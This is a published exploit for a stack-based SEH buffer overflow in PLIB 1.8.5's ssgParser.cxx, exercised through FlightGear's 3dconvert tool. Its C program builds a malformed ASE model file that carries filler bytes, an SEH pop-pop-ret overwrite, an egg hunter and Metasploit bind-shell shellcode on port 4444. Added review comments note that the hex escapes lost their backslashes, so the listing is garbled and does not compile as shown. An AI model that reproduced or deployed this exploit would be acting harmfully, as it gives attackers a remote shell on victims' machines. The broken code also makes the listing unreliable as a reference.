
# Title : PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow
# Published : 2012-10-09
# Author :


/* 
# Exploit Title: Plib + flightgear 3dconvert exploit
# Date: 08/10/2012
# Author: Andres Gomez
# Software Links: 
# Plib: http://plib.sourceforge.net/
# flightgear: http://www.flightgear.org/
# 3dconvert: ftp://ftp.ihg.uni-duisburg.de/FlightGear/Win32/old/3dconvert-win32.zip
# Version: Plib 1.8.5
# Tested on: Windows XP Service Pack 3 Spanish
*/

/* 

   Plib is prone to a stack-based buffer overflow in the error function in ssg/ssgParser.cxx when it loads
   3D model files such as X (DirectX), ASC, ASE, ATG, and OFF.

   This exploit uses FlightGear's 3dconvert utility. It creates a corrupted ASE file, "test.ase"; then run:

   FlightGear\bin\Win32\3dconvert.exe test.ase test.obj

*/


#include <stdio.h>
#include <stdlib.h>

/*
   Shellcode: msfpayload windows/shell_bind_tcp LPORT=4444 R | ./msfencode -e x86/alpha_mixed C
*/

/*
 * Payload data written into test.ase by main(). Each array is a C string of
 * raw bytes. NOTE(review): in this listing the hex escapes have lost their
 * leading backslashes during extraction (the literals read "x89xe0..." rather
 * than hex escapes), so as shown they are plain ASCII text, not the intended
 * bytes, and the file does not build as-is.
 */

/* Stage 2: the bind-shell payload produced by the msfpayload/msfencode command
   in the comment above (alpha-mixed encoding). main() writes it immediately
   after the `egg` marker. */
unsigned char shellcode[] = 
"x89xe0xddxc6xd9x70xf4x5dx55x59x49x49x49x49"
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51"
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32"
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41"
"x42x75x4ax49x69x6cx5ax48x4fx79x33x30x75x50"
"x67x70x71x70x4bx39x78x65x45x61x4ax72x71x74"
"x6cx4bx76x32x44x70x4ex6bx73x62x46x6cx6ex6b"
"x36x32x66x74x4cx4bx50x72x47x58x36x6fx4cx77"
"x50x4ax54x66x35x61x79x6fx45x61x4bx70x6ex4c"
"x47x4cx31x71x33x4cx35x52x56x4cx31x30x6ax61"
"x58x4fx34x4dx45x51x79x57x4dx32x6cx30x32x72"
"x61x47x4ex6bx66x32x44x50x4ex6bx47x32x37x4c"
"x55x51x6ex30x6ex6bx61x50x32x58x6ex65x79x50"
"x34x34x73x7ax46x61x5ax70x46x30x6ex6bx72x68"
"x66x78x6cx4bx63x68x55x70x66x61x78x53x49x73"
"x75x6cx77x39x6cx4bx64x74x6cx4bx57x71x7ax76"
"x45x61x39x6fx76x51x6bx70x4ex4cx5ax61x68x4f"
"x64x4dx66x61x4ax67x45x68x39x70x70x75x5ax54"
"x43x33x51x6dx58x78x45x6bx71x6dx47x54x54x35"
"x7ax42x53x68x4ex6bx66x38x44x64x53x31x4ex33"
"x43x56x4cx4bx56x6cx32x6bx4ex6bx36x38x77x6c"
"x37x71x4ax73x6ex6bx66x64x4cx4bx46x61x78x50"
"x4cx49x50x44x36x44x71x34x63x6bx53x6bx33x51"
"x46x39x70x5ax70x51x49x6fx49x70x32x78x61x4f"
"x70x5ax6cx4bx67x62x6ax4bx4dx56x43x6dx52x48"
"x67x43x46x52x47x70x43x30x65x38x50x77x54x33"
"x45x62x31x4fx71x44x65x38x62x6cx53x47x34x66"
"x53x37x39x6fx7ax75x6dx68x4ax30x35x51x53x30"
"x45x50x76x49x78x44x46x34x56x30x72x48x56x49"
"x4bx30x62x4bx43x30x39x6fx48x55x42x70x50x50"
"x76x30x52x70x73x70x70x50x51x50x62x70x75x38"
"x39x7ax36x6fx6bx6fx39x70x69x6fx48x55x6ex69"
"x58x47x35x61x79x4bx66x33x30x68x56x62x73x30"
"x37x61x63x6cx6cx49x6ax46x62x4ax64x50x73x66"
"x72x77x51x78x6ax62x49x4bx46x57x42x47x4bx4f"
"x39x45x73x63x61x47x35x38x58x37x69x79x30x38"
"x59x6fx69x6fx4ax75x61x43x31x43x53x67x30x68"
"x62x54x68x6cx65x6bx69x71x59x6fx68x55x56x37"
"x4dx59x7ax67x53x58x71x65x72x4ex42x6dx45x31"
"x6bx4fx68x55x43x58x53x53x42x4dx35x34x77x70"
"x4cx49x69x73x42x77x42x77x70x57x46x51x49x66"
"x30x6ax64x52x56x39x66x36x68x62x69x6dx75x36"
"x78x47x67x34x61x34x57x4cx67x71x47x71x4ex6d"
"x63x74x54x64x36x70x48x46x53x30x42x64x72x74"
"x46x30x46x36x76x36x42x76x53x76x63x66x42x6e"
"x72x76x53x66x56x33x62x76x51x78x42x59x68x4c"
"x75x6fx6bx36x49x6fx48x55x4dx59x4bx50x32x6e"
"x36x36x61x56x49x6fx76x50x53x58x43x38x6fx77"
"x57x6dx35x30x6bx4fx4bx65x6dx6bx58x70x78x35"
"x4ex42x72x76x63x58x6fx56x4cx55x6dx6dx6dx4d"
"x6bx4fx39x45x55x6cx37x76x61x6cx45x5ax4bx30"
"x6bx4bx69x70x54x35x77x75x4fx4bx77x37x52x33"
"x52x52x32x4fx51x7ax77x70x30x53x59x6fx6ax75"
"x41x41";

/* Stage 1: written by main() right after the SEH overwrite; presumably scans
   for the `egg` marker below and hands off to the bytes following it. */
unsigned char egg_hunter [] = 
"xdbxd9xd9x74x24xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x43x37x51x5a"
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41"
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42"
"x75x4ax49x43x56x4ex61x6ax6ax4bx4fx54x4fx51"
"x52x76x32x42x4ax33x73x51x48x68x4dx56x4ex75"
"x6cx66x65x30x5ax71x64x78x6fx4ex58x5ax30x52"
"x70x6ax30x30x50x6cx4bx79x6ax6ex4fx34x35x7a"
"x4ax4cx6fx62x55x6dx37x49x6fx6ax47x41x41";

/* Marker (a two-byte tag repeated four times) that main() places directly
   before `shellcode` in the output file. */
unsigned char egg [] = "x90x50x90x50x90x50x90x50";
/* Address is specific to the tested build (Windows XP SP3 Spanish, per the
   header comment) and is not expected to hold on other targets. */
unsigned char seh_pointer [] = "x49x19xE1x08"; // seh pointer pop pop ret; 
unsigned char short_jump [] = "xEBx0Cx41x41"; // short jump;

/*
 * Entry point: writes the malformed ASE model file "test.ase" into the current
 * working directory. The file is a plausible 3DSMAX ASCII preamble followed by
 * a *SUBMATERIAL field far longer than any legitimate name, which is the input
 * the error function in ssg/ssgParser.cxx (see header comment) fails to bound.
 *
 * From a defensive standpoint the layout below doubles as a detection
 * heuristic: an ASE file whose *SUBMATERIAL token runs to well over a
 * thousand bytes before the next "{" is not something a modeller produces.
 *
 * NOTE(review): the escape sequences in this listing lost their backslashes
 * during extraction (e.g. 'x41', the trailing `n` on each template line, and
 * the unescaped inner quotes on the *COMMENT / *SCENE_FILENAME /
 * *MATERIAL_NAME lines), so the code does not compile as shown.
 *
 * argc/argv are unused. Returns 0 on success, -1 if the output file cannot be
 * opened.
 */
int main(int argc, char **argv) {

    FILE *save_fd;
    int i=0;

    /* Unconditionally overwrites test.ase in the working directory. */
    save_fd = fopen("test.ase", "w+");

    if (save_fd == NULL) {
	    printf("Failed to open '%s' for writing", "test.ase");
	    return -1;
    }

    /* Well-formed ASE preamble so the parser gets as far as *SUBMATERIAL. */
    fprintf(save_fd,    "*3DSMAX_ASCIIEXPORT 200n"
			"*COMMENT "created by SSG."n"
			"*SCENE {n"
			"  *SCENE_FILENAME ""n"
			"  *SCENE_FIRSTFRAME 0n"
			"  *SCENE_LASTFRAME 100n"
			"  *SCENE_FRAMESPEED 30n"
			"  *SCENE_TICKSPERFRAME 160n"
			"  *SCENE_BACKGROUND_STATIC 0.0000 0.0000 0.0000n"
			"  *SCENE_AMBIENT_STATIC 0.0431 0.0431 0.0431n"
			"}n"
			"*MATERIAL_LIST {n"
			"  *MATERIAL_COUNT 2n"
			"  *MATERIAL 0 {n"
			"    *MATERIAL_NAME "Material #0"n"
			"    *MATERIAL_CLASS "Standard"n"
			"    *MATERIAL_AMBIENT 1.000000 1.000000 1.000000n"
			"    *MATERIAL_DIFFUSE 1.000000 1.000000 1.000000n"
			"    *MATERIAL_SPECULAR 0.502000 0.502000 0.502000n"
			"    *MATERIAL_SHINE 50.000000n"
			"    *MATERIAL_SHINESTRENGTH 50.000000n"
			"    *MATERIAL_TRANSPARENCY 0.000000n"
			"    *MATERIAL_WIRESIZE 1.0000n"
			"    *MATERIAL_SHADING Blinnn"
			"    *MATERIAL_XP_FALLOFF 0.0000n"
			"    *MATERIAL_SELFILLUM 0.0000n"
			"    *MATERIAL_TWOSIDEDn"
			"    *MATERIAL_FALLOFF Inn"
			"    *MATERIAL_SOFTENn"
			"    *MATERIAL_XP_TYPE Filtern"
			"	*SUBMATERIAL ");
    /* 573 filler bytes, then the two 4-byte values declared above
       (short_jump, seh_pointer). */
    for(i=0; i < 573; i++) {
    	putc('x41', save_fd);
    }
    fprintf(save_fd, "%s", short_jump);
    fprintf(save_fd, "%s", seh_pointer);
    /* 0x0F (15) bytes of 0x90 padding ahead of the egg hunter. */
    for(i=0; i < 0x0F; i++) {
    	putc('x90', save_fd);
    }

    /* Stage 1 hunter, a second 573-byte filler run, then the egg marker and
       the payload it looks for. */
    fprintf(save_fd, "%s", egg_hunter);
    for(i=0; i < 573; i++) {
    	putc('x41', save_fd);
    }
    fprintf(save_fd, "%s", egg);
    fprintf(save_fd, "%s", shellcode);
    
    /* Trailing " {" so the oversized token is followed by a block opener,
       as a real *SUBMATERIAL entry would be (presumably to keep the parser
       going). */
    fprintf(save_fd, " {n");
    
    /* NOTE(review): close() takes an int descriptor; save_fd is a FILE*, so the
       matching call is fclose(save_fd), which also flushes the stdio buffer.
       <unistd.h> is not included, so close() is also implicitly declared here. */
    close(save_fd);

    return 0;
}